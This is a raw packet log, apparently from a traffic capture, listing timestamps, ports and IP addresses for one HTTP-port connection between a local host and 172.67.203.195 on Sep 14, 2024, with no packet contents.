Sep 14, 2024 18:31:11.693475962 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693480015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693492889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693504095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693515062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693521023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693535089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693572998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693584919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693587065 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693624973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693824053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693862915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693873882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693909883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.693948030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693958998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693983078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.693995953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694000959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694013119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694021940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694031954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694035053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694044113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694055080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694070101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694075108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694087982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694092035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694098949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694112062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694133043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694153070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694184065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694195032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694205046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694215059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694226027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694235086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694242954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694253922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694256067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694267988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694313049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694343090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694358110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694432020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694442987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694453955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694464922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694474936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694485903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.694489956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694523096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.694552898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.701803923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.703360081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703368902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703378916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703402996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703416109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703428984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703443050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.703461885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703474045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.703494072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.703525066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.734209061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734340906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734350920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734361887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734371901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734384060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734395027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734400988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.734405994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.734502077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.734502077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.779681921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779697895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779710054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779720068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779731989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779741049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779747963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779758930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779768944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779779911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779791117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779800892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779814959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779831886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779843092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779854059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779863119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779874086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779886961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.779887915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.779984951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.779984951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.779984951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.779984951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.779984951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780380011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780396938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780409098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780420065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780431032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780441999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780452967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780457020 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780468941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780479908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780481100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780491114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780503035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780503988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780514002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780527115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780535936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780546904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780548096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780558109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780567884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780591965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780621052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.780881882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780934095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780944109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780961990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780978918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.780983925 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781014919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781022072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781033993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781074047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781088114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781100035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781138897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781152010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781163931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781173944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781208992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781243086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781374931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781384945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781395912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781407118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781423092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781431913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781434059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781466961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781486034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781488895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781500101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781511068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781521082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781533003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781542063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781553030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781584024 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781615973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781713009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781723976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781739950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781749964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781760931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781771898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781788111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781796932 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781799078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781810999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781822920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781824112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781836987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781846046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781848907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781869888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781899929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.781913042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781924009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781934977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.781965971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782119036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782130003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782140017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782150984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782160044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782171011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782181025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782188892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782191992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782211065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782222033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782223940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782233000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782243967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782253027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782264948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782267094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782275915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782285929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782293081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782299042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782315016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782330990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782361984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782475948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782485962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782537937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782547951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.782561064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.782593012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.790460110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.790471077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.790474892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.790517092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.790525913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.790534973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.790543079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.790570021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.790570974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.790608883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.819669962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.819706917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.819716930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.819772005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.819777012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.819782019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.819793940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.819804907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.819927931 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.819927931 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.862900972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.862943888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.862952948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863001108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863010883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863020897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863065004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863075018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863085032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863208055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863218069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863226891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863231897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.863236904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863231897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.863231897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.863248110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863257885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.863323927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.863323927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.865988016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866030931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866040945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866050959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866055012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866095066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866128922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866138935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866148949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866158009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866178036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866182089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866218090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866249084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866319895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866331100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866339922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866349936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866360903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866369963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866381884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866384029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866391897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866409063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866440058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866472960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866483927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866493940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866504908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.866525888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.866555929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.867749929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867762089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867772102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867810965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867813110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.867846966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867858887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867868900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.867899895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.867937088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867948055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867965937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867975950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867986917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.867996931 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.867997885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868020058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868076086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868311882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868323088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868333101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868343115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868354082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868362904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868372917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868375063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868386984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868397951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868408918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868418932 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868455887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868455887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868474007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868484974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868495941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868511915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868525028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868531942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868535995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868546963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868552923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868560076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868576050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868577957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868593931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868604898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.868608952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.868617058 CEST	80	49738	172.67.203.195	192.168.2.4
